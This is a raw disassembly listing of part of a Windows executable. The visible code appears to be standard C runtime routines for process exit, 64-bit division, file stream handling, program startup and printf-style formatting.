jz short loc_415F3E
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_420084 ; GetProcAddress
test eax, eax
jz short loc_415F3E
push [esp+arg_0]
call eax ; dword_42B030
loc_415F3E: ; CODE XREF: sub_415F19+D�j
; sub_415F19+1D�j
push [esp+arg_0]
call ds:dword_420034 ; ExitProcess
int 3 ; Trap to Debugger
loc_415F49: ; CODE XREF: sub_41B276+C�p
push 8
call sub_418285
pop ecx
retn
sub_415F19 endp
; =============== S U B R O U T I N E =======================================
sub_415F52 proc near ; CODE XREF: sub_41B2A8�p
push 8
call sub_4181F1
pop ecx
retn
sub_415F52 endp
; =============== S U B R O U T I N E =======================================
sub_415F5B proc near ; CODE XREF: .text:loc_416425�p
mov eax, off_42D798
test eax, eax
jz short loc_415F66
call eax ; sub_414EFD
loc_415F66: ; CODE XREF: sub_415F5B+7�j
push esi
push edi
mov ecx, offset dword_42B00C
mov edi, offset dword_42B020
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_415F91
loc_415F7A: ; CODE XREF: sub_415F5B+30�j
test eax, eax
jnz short loc_415FBD
mov ecx, [esi]
test ecx, ecx
jz short loc_415F86
call ecx
loc_415F86: ; CODE XREF: sub_415F5B+27�j
add esi, 4
cmp esi, edi
jb short loc_415F7A
test eax, eax
jnz short loc_415FBD
loc_415F91: ; CODE XREF: sub_415F5B+1D�j
push offset sub_41B304
call sub_41B2AE
mov esi, offset dword_42B000
mov eax, esi
mov edi, offset dword_42B008
cmp eax, edi
pop ecx
jnb short loc_415FBB
loc_415FAC: ; CODE XREF: sub_415F5B+5E�j
mov eax, [esi]
test eax, eax
jz short loc_415FB4
call eax
loc_415FB4: ; CODE XREF: sub_415F5B+55�j
add esi, 4
cmp esi, edi
jb short loc_415FAC
loc_415FBB: ; CODE XREF: sub_415F5B+4F�j
xor eax, eax
loc_415FBD: ; CODE XREF: sub_415F5B+21�j
; sub_415F5B+34�j
pop edi
pop esi
retn
sub_415F5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415FC0 proc near ; CODE XREF: sub_416093+8�p
; sub_4160A4+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push 8
call sub_418285
xor esi, esi
inc esi
cmp dword_47C1E4, esi
pop ecx
jnz short loc_415FE8
push [ebp+arg_0]
call ds:dword_4200E0 ; GetCurrentProcess
push eax
call ds:dword_4200E8 ; TerminateProcess
loc_415FE8: ; CODE XREF: sub_415FC0+16�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_47C1E0, esi
mov byte_47C1DC, al
jnz short loc_41604E
mov ecx, dword_47D9B0
test ecx, ecx
jz short loc_41602F
mov eax, dword_47D9AC
sub eax, 4
cmp eax, ecx
jmp short loc_416028
; ---------------------------------------------------------------------------
loc_416012: ; CODE XREF: sub_415FC0+6D�j
mov eax, [eax]
test eax, eax
jz short loc_41601A
call eax
loc_41601A: ; CODE XREF: sub_415FC0+56�j
mov eax, dword_47D9AC
sub eax, 4
cmp eax, dword_47D9B0
loc_416028: ; CODE XREF: sub_415FC0+50�j
mov dword_47D9AC, eax
jnb short loc_416012
loc_41602F: ; CODE XREF: sub_415FC0+44�j
mov eax, offset dword_42B024
mov esi, offset dword_42B02C
cmp eax, esi
mov edi, eax
jnb short loc_41604E
loc_41603F: ; CODE XREF: sub_415FC0+8C�j
mov eax, [edi]
test eax, eax
jz short loc_416047
call eax
loc_416047: ; CODE XREF: sub_415FC0+83�j
add edi, 4
cmp edi, esi
jb short loc_41603F
loc_41604E: ; CODE XREF: sub_415FC0+3A�j
; sub_415FC0+7D�j
mov eax, offset dword_42B030
mov esi, offset dword_42B038
cmp eax, esi
mov edi, eax
jnb short loc_41606D
loc_41605E: ; CODE XREF: sub_415FC0+AB�j
mov eax, [edi]
test eax, eax
jz short loc_416066
call eax
loc_416066: ; CODE XREF: sub_415FC0+A2�j
add edi, 4
cmp edi, esi
jb short loc_41605E
loc_41606D: ; CODE XREF: sub_415FC0+9C�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_41607E
push 8
call sub_4181F1
jmp short loc_416090
; ---------------------------------------------------------------------------
loc_41607E: ; CODE XREF: sub_415FC0+B3�j
push [ebp+arg_0]
mov dword_47C1E4, 1
call sub_415F19
loc_416090: ; CODE XREF: sub_415FC0+BC�j
pop ecx
pop ebp
retn
sub_415FC0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416093 proc near ; CODE XREF: .text:00416475�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_415FC0
add esp, 0Ch
retn
sub_416093 endp
; =============== S U B R O U T I N E =======================================
sub_4160A4 proc near ; CODE XREF: sub_4162A0+1C�p
; .text:004164A2�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_415FC0
add esp, 0Ch
retn
sub_4160A4 endp
; =============== S U B R O U T I N E =======================================
sub_4160B5 proc near ; CODE XREF: .text:loc_41647A�p
push 1
push 0
push 0
call sub_415FC0
add esp, 0Ch
retn
sub_4160B5 endp
; =============== S U B R O U T I N E =======================================
sub_4160C4 proc near ; CODE XREF: .text:loc_4164A7�p
push 1
push 1
push 0
call sub_415FC0
add esp, 0Ch
retn
sub_4160C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4160E0 proc near ; CODE XREF: sub_4116A6+3D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416101
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416151
; ---------------------------------------------------------------------------
loc_416101: ; CODE XREF: sub_4160E0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41610F: ; CODE XREF: sub_4160E0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41610F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41613A
cmp edx, [esp+4+arg_4]
ja short loc_41613A
jb short loc_416142
cmp eax, [esp+4+arg_0]
jbe short loc_416142
loc_41613A: ; CODE XREF: sub_4160E0+4A�j
; sub_4160E0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416142: ; CODE XREF: sub_4160E0+52�j
; sub_4160E0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416151: ; CODE XREF: sub_4160E0+1F�j
pop ebx
retn 10h
sub_4160E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416160 proc near ; CODE XREF: sub_4116A6+24�p
; sub_415420+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416182
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4161C3
; ---------------------------------------------------------------------------
loc_416182: ; CODE XREF: sub_416160+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416190: ; CODE XREF: sub_416160+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416190
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4161BE
cmp edx, [esp+8+arg_4]
ja short loc_4161BE
jb short loc_4161BF
cmp eax, [esp+8+arg_0]
jbe short loc_4161BF
loc_4161BE: ; CODE XREF: sub_416160+4E�j
; sub_416160+54�j
dec esi
loc_4161BF: ; CODE XREF: sub_416160+56�j
; sub_416160+5C�j
xor edx, edx
mov eax, esi
loc_4161C3: ; CODE XREF: sub_416160+20�j
pop esi
pop ebx
retn 10h
sub_416160 endp
; =============== S U B R O U T I N E =======================================
sub_4161C8 proc near ; CODE XREF: sub_416257+22�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
push edi
jz short loc_416246
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_4161E7
cmp edi, 1
jz short loc_4161E7
cmp edi, 2
jnz short loc_416246
loc_4161E7: ; CODE XREF: sub_4161C8+13�j
; sub_4161C8+18�j
and eax, 0FFFFFFEFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_4161FF
push esi
call sub_41B467
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_4161FF: ; CODE XREF: sub_4161C8+28�j
push esi
call sub_417DD2
mov eax, [esi+0Ch]
test al, al
pop ecx
jns short loc_416215
and eax, 0FFFFFFFCh
mov [esi+0Ch], eax
jmp short loc_416229
; ---------------------------------------------------------------------------
loc_416215: ; CODE XREF: sub_4161C8+43�j
test al, 1
jz short loc_416229
test al, 8
jz short loc_416229
test ah, 4
jnz short loc_416229
mov dword ptr [esi+18h], 200h
loc_416229: ; CODE XREF: sub_4161C8+4B�j
; sub_4161C8+4F�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41B3BC
xor ecx, ecx
add esp, 0Ch
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_416254
; ---------------------------------------------------------------------------
loc_416246: ; CODE XREF: sub_4161C8+B�j
; sub_4161C8+1D�j
call sub_419600
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_416254: ; CODE XREF: sub_4161C8+7C�j
pop edi
pop esi
retn
sub_4161C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416257 proc near ; CODE XREF: sub_411FA9+2C6�p
; sub_411FA9+402�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset stru_428DE0
call __SEH_prolog
push [ebp+arg_0]
call sub_417FF8
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4161C8
add esp, 0Ch
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416296
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_416257 endp
; =============== S U B R O U T I N E =======================================
sub_416296 proc near ; CODE XREF: sub_416257+31�p
; DATA XREF: .rdata:stru_428DE0�o
push dword ptr [ebp+8]
call sub_41804A
pop ecx
retn
sub_416296 endp
; =============== S U B R O U T I N E =======================================
sub_4162A0 proc near ; CODE XREF: .text:004163E8�p
; .text:0041640E�p ...
arg_0 = dword ptr 4
cmp dword_47C1F0, 1
jnz short loc_4162AE
call sub_41B740
loc_4162AE: ; CODE XREF: sub_4162A0+7�j
push [esp+arg_0]
call sub_41B5C9
push 0FFh
call off_42D7C0
pop ecx
pop ecx
retn
sub_4162A0 endp
; =============== S U B R O U T I N E =======================================
sub_4162C5 proc near ; CODE XREF: .text:004163BE�p
; .text:004163CF�p
arg_0 = dword ptr 4
cmp dword_47C1F0, 1
jnz short loc_4162D3
call sub_41B740
loc_4162D3: ; CODE XREF: sub_4162C5+7�j
push [esp+arg_0]
call sub_41B5C9
push 0FFh
call sub_415F19
pop ecx
pop ecx
retn
sub_4162C5 endp
; ---------------------------------------------------------------------------
push 60h
push offset stru_428DF0
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_414800
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call ds:dword_420120 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_47C1A4, ecx
mov eax, [esi+4]
mov dword_47C1B0, eax
mov edx, [esi+8]
mov dword_47C1B4, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_47C1A8, esi
cmp ecx, 2
jz short loc_416349
or esi, 8000h
mov dword_47C1A8, esi
loc_416349: ; CODE XREF: .text:0041633B�j
shl eax, 8
add eax, edx
mov dword_47C1AC, eax
xor esi, esi
push esi
mov edi, ds:dword_4200A4
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_416384
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_416384
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_41639C
cmp eax, 20Bh
jz short loc_416389
loc_416384: ; CODE XREF: .text:00416363�j
; .text:00416370�j ...
mov [ebp-1Ch], esi
jmp short loc_4163B0
; ---------------------------------------------------------------------------
loc_416389: ; CODE XREF: .text:00416382�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_416384
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_4163AA
; ---------------------------------------------------------------------------
loc_41639C: ; CODE XREF: .text:0041637B�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_416384
xor eax, eax
cmp [ecx+0E8h], esi
loc_4163AA: ; CODE XREF: .text:0041639A�j
setnz al
mov [ebp-1Ch], eax
loc_4163B0: ; CODE XREF: .text:00416387�j
push 1
call sub_418102
pop ecx
test eax, eax
jnz short loc_4163C4
push 1Ch
call sub_4162C5
pop ecx
loc_4163C4: ; CODE XREF: .text:004163BA�j
call sub_416E86
test eax, eax
jnz short loc_4163D5
push 10h
call sub_4162C5
pop ecx
loc_4163D5: ; CODE XREF: .text:004163CB�j
call sub_41B2C0
mov [ebp-4], esi
call sub_41BD3D
test eax, eax
jge short loc_4163EE
push 1Bh
call sub_4162A0
pop ecx
loc_4163EE: ; CODE XREF: .text:004163E4�j
call ds:dword_420168 ; GetCommandLineA
mov dword_47D9A4, eax
call sub_41BC1B
mov dword_47C1E8, eax
call sub_41BB79
test eax, eax
jge short loc_416414
push 8
call sub_4162A0
pop ecx
loc_416414: ; CODE XREF: .text:0041640A�j
call sub_41B946
test eax, eax
jge short loc_416425
push 9
call sub_4162A0
pop ecx
loc_416425: ; CODE XREF: .text:0041641B�j
call sub_415F5B
mov [ebp-20h], eax
cmp eax, esi
jz short loc_416438
push eax
call sub_4162A0
pop ecx
loc_416438: ; CODE XREF: .text:0041642F�j
mov [ebp-38h], esi
lea eax, [ebp-64h]
push eax
call ds:dword_420164 ; GetStartupInfoA
call sub_41B8DD
mov [ebp-68h], eax
test byte ptr [ebp-38h], 1
jz short loc_416459
movzx eax, word ptr [ebp-34h]
jmp short loc_41645C
; ---------------------------------------------------------------------------
loc_416459: ; CODE XREF: .text:00416451�j
push 0Ah
pop eax
loc_41645C: ; CODE XREF: .text:00416457�j
push eax
push dword ptr [ebp-68h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_40E745
mov edi, eax
mov [ebp-6Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_41647A
push edi
call sub_416093
loc_41647A: ; CODE XREF: .text:00416472�j
call sub_4160B5
jmp short loc_4164AC
; ---------------------------------------------------------------------------
loc_416481: ; DATA XREF: .rdata:stru_428DF0�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-70h], ecx
push eax
push ecx
call sub_41B779
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_416495: ; DATA XREF: .rdata:stru_428DF0�o
mov esp, [ebp-18h]
mov edi, [ebp-70h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_4164A7
push edi
call sub_4160A4
loc_4164A7: ; CODE XREF: .text:0041649F�j
call sub_4160C4
loc_4164AC: ; CODE XREF: .text:0041647F�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4164BB proc near ; CODE XREF: sub_4145E5+4B�p
; sub_41483D+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_4165C7
test al, 40h
jnz loc_4165C7
test al, 1
jz short loc_4164F4
and dword ptr [esi+4], 0
test al, 10h
jz loc_4165C7
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_4164F4: ; CODE XREF: sub_4164BB+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_416530
cmp esi, offset dword_42D998
jz short loc_41651E
cmp esi, offset dword_42D9B8
jnz short loc_416529
loc_41651E: ; CODE XREF: sub_4164BB+59�j
push ebx
call sub_41C1CF
test eax, eax
pop ecx
jnz short loc_416530
loc_416529: ; CODE XREF: sub_4164BB+61�j
push esi
call sub_41C18B
pop ecx
loc_416530: ; CODE XREF: sub_4164BB+51�j
; sub_4164BB+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_41659D
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_41655D
push edi
push eax
push ebx
call sub_41C0E0
mov [ebp+arg_4], eax
jmp short loc_416590
; ---------------------------------------------------------------------------
loc_41655D: ; CODE XREF: sub_4164BB+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_41657B
mov ecx, ebx
sar ecx, 5
mov ecx, dword_47C620[ecx*4]
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_416580
; ---------------------------------------------------------------------------
loc_41657B: ; CODE XREF: sub_4164BB+A5�j
mov eax, offset dword_42E0D0
loc_416580: ; CODE XREF: sub_4164BB+BE�j
test byte ptr [eax+4], 20h
jz short loc_416593
push 2
push 0
push ebx
call sub_41B3BC
loc_416590: ; CODE XREF: sub_4164BB+A0�j
add esp, 0Ch
loc_416593: ; CODE XREF: sub_4164BB+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_4165B1
; ---------------------------------------------------------------------------
loc_41659D: ; CODE XREF: sub_4164BB+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41C0E0
add esp, 0Ch
mov [ebp+arg_4], eax
loc_4165B1: ; CODE XREF: sub_4164BB+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_4165BD
or dword ptr [esi+0Ch], 20h
jmp short loc_4165CD
; ---------------------------------------------------------------------------
loc_4165BD: ; CODE XREF: sub_4164BB+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_4165D0
; ---------------------------------------------------------------------------
loc_4165C7: ; CODE XREF: sub_4164BB+10�j
; sub_4164BB+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_4165CD: ; CODE XREF: sub_4164BB+100�j
or eax, 0FFFFFFFFh
loc_4165D0: ; CODE XREF: sub_4164BB+10A�j
pop esi
pop ebx
pop ebp
retn
sub_4164BB endp
; =============== S U B R O U T I N E =======================================
sub_4165D4 proc near ; CODE XREF: sub_416607+11�p
; sub_41662B+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_4165E0
cmp dword ptr [ecx+8], 0
jz short loc_416604
loc_4165E0: ; CODE XREF: sub_4165D4+4�j
dec dword ptr [ecx+4]
js short loc_4165F0
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4165FC
; ---------------------------------------------------------------------------
loc_4165F0: ; CODE XREF: sub_4165D4+F�j
movsx eax, al
push ecx
push eax
call sub_4164BB
pop ecx
pop ecx
loc_4165FC: ; CODE XREF: sub_4165D4+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_416604
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_416604: ; CODE XREF: sub_4165D4+A�j
; sub_4165D4+2B�j
inc dword ptr [esi]
retn
sub_4165D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416607 proc near ; CODE XREF: sub_416662+6A2�p
; sub_416662+6CD�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_416622
; ---------------------------------------------------------------------------
loc_41660F: ; CODE XREF: sub_416607+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_4165D4
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_416628
loc_416622: ; CODE XREF: sub_416607+6�j
cmp [ebp+arg_4], 0
jg short loc_41660F
loc_416628: ; CODE XREF: sub_416607+19�j
pop esi
pop ebp
retn
sub_416607 endp
; =============== S U B R O U T I N E =======================================
sub_41662B proc near ; CODE XREF: sub_416662+6B6�p
; sub_416662+70E�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_416658
cmp dword ptr [edi+8], 0
jnz short loc_416658
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_41665F
; ---------------------------------------------------------------------------
loc_416645: ; CODE XREF: sub_41662B+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_4165D4
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41665F
loc_416658: ; CODE XREF: sub_41662B+A�j
; sub_41662B+10�j
cmp [esp+8+arg_0], 0
jg short loc_416645
loc_41665F: ; CODE XREF: sub_41662B+18�j
; sub_41662B+2B�j
pop esi
pop ebx
retn
sub_41662B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416662 proc near ; CODE XREF: sub_4145E5+2A�p
; sub_41483D+29�p ...
var_254 = byte ptr -254h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_2C], eax
mov eax, [ebp+arg_4]
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_416DC6
push esi
push edi
mov edi, eax
jmp short loc_41669A
; ---------------------------------------------------------------------------
loc_416697: ; CODE XREF: sub_416662+75C�j
mov ecx, [ebp+var_38]
loc_41669A: ; CODE XREF: sub_416662+33�j
inc edi
cmp [ebp+var_18], 0
mov [ebp+arg_4], edi
jl loc_416DC4
cmp bl, 20h
jl short loc_4166C1
cmp bl, 78h
jg short loc_4166C1
movsx eax, bl
movsx eax, byte ptr ds:stru_428DE0._unk[eax]
and eax, 0Fh
jmp short loc_4166C3
; ---------------------------------------------------------------------------
loc_4166C1: ; CODE XREF: sub_416662+49�j
; sub_416662+4E�j
xor eax, eax
loc_4166C3: ; CODE XREF: sub_416662+5D�j
movsx eax, ds:byte_428E00[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+var_38], eax
ja loc_416DB7 ; default
jmp ds:off_416DD7[eax*4] ; switch jump
loc_4166E3: ; DATA XREF: .text:off_416DD7�o
xor eax, eax ; jumptable 004166DC case 1
or [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_3C], eax
mov [ebp+var_34], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov [ebp+var_28], eax
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416700: ; CODE XREF: sub_416662+7A�j
; DATA XREF: .text:off_416DD7�o
movsx eax, bl ; jumptable 004166DC case 2
sub eax, 20h
jz short loc_416743
sub eax, 3
jz short loc_41673A
sub eax, 8
jz short loc_416731
dec eax
dec eax
jz short loc_416728
sub eax, 3
jnz loc_416DB7 ; default
or [ebp+var_8], 8
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416728: ; CODE XREF: sub_416662+B2�j
or [ebp+var_8], 4
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416731: ; CODE XREF: sub_416662+AE�j
or [ebp+var_8], 1
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_41673A: ; CODE XREF: sub_416662+A9�j
or byte ptr [ebp+var_8], 80h
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416743: ; CODE XREF: sub_416662+A4�j
or [ebp+var_8], 2
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_41674C: ; CODE XREF: sub_416662+7A�j
; DATA XREF: .text:off_416DD7�o
cmp bl, 2Ah ; jumptable 004166DC case 3
jnz short loc_416772
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_24], eax
jge loc_416DB7 ; default
or [ebp+var_8], 4
neg [ebp+var_24]
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416772: ; CODE XREF: sub_416662+ED�j
mov eax, [ebp+var_24]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_24], eax
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416787: ; CODE XREF: sub_416662+7A�j
; DATA XREF: .text:off_416DD7�o
and [ebp+var_C], 0 ; jumptable 004166DC case 4
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416790: ; CODE XREF: sub_416662+7A�j
; DATA XREF: .text:off_416DD7�o
cmp bl, 2Ah ; jumptable 004166DC case 5
jnz short loc_4167B3
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_C], eax
jge loc_416DB7 ; default
or [ebp+var_C], 0FFFFFFFFh
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_4167B3: ; CODE XREF: sub_416662+131�j
mov eax, [ebp+var_C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_C], eax
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_4167C8: ; CODE XREF: sub_416662+7A�j
; DATA XREF: .text:off_416DD7�o
cmp bl, 49h ; jumptable 004166DC case 6
jz short loc_4167FB
cmp bl, 68h
jz short loc_4167F2
cmp bl, 6Ch
jz short loc_4167E9
cmp bl, 77h
jnz loc_416DB7 ; default
or byte ptr [ebp+var_8+1], 8
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_4167E9: ; CODE XREF: sub_416662+173�j
or [ebp+var_8], 10h
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_4167F2: ; CODE XREF: sub_416662+16E�j
or [ebp+var_8], 20h
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_4167FB: ; CODE XREF: sub_416662+169�j
mov al, [edi]
cmp al, 36h
jnz short loc_416815
cmp byte ptr [edi+1], 34h
jnz short loc_416815
inc edi
inc edi
or byte ptr [ebp+var_8+1], 80h
mov [ebp+arg_4], edi
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_416815: ; CODE XREF: sub_416662+19D�j
; sub_416662+1A3�j
cmp al, 33h
jnz short loc_41682D
cmp byte ptr [edi+1], 32h
jnz short loc_41682D
inc edi
inc edi
and byte ptr [ebp+var_8+1], 7Fh
mov [ebp+arg_4], edi
jmp loc_416DB7 ; default
; ---------------------------------------------------------------------------
loc_41682D: ; CODE XREF: sub_416662+1B5�j
; sub_416662+1BB�j
cmp al, 64h
jz loc_416DB7 ; default
cmp al, 69h
jz loc_416DB7 ; default
cmp al, 6Fh
jz loc_416DB7 ; default
cmp al, 75h
jz loc_416DB7 ; default
cmp al, 78h
jz loc_416DB7 ; default
cmp al, 58h
jz loc_416DB7 ; default
and [ebp+var_38], 0
loc_416861: ; CODE XREF: sub_416662+7A�j
; DATA XREF: .text:off_416DD7�o
mov ecx, off_42DEA0 ; jumptable 004166DC case 0
and [ebp+var_28], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_416888
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_4165D4
mov bl, [edi]
inc edi
mov [ebp+arg_4], edi
loc_416888: ; CODE XREF: sub_416662+211�j
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_4165D4
jmp loc_416DB7 ; default
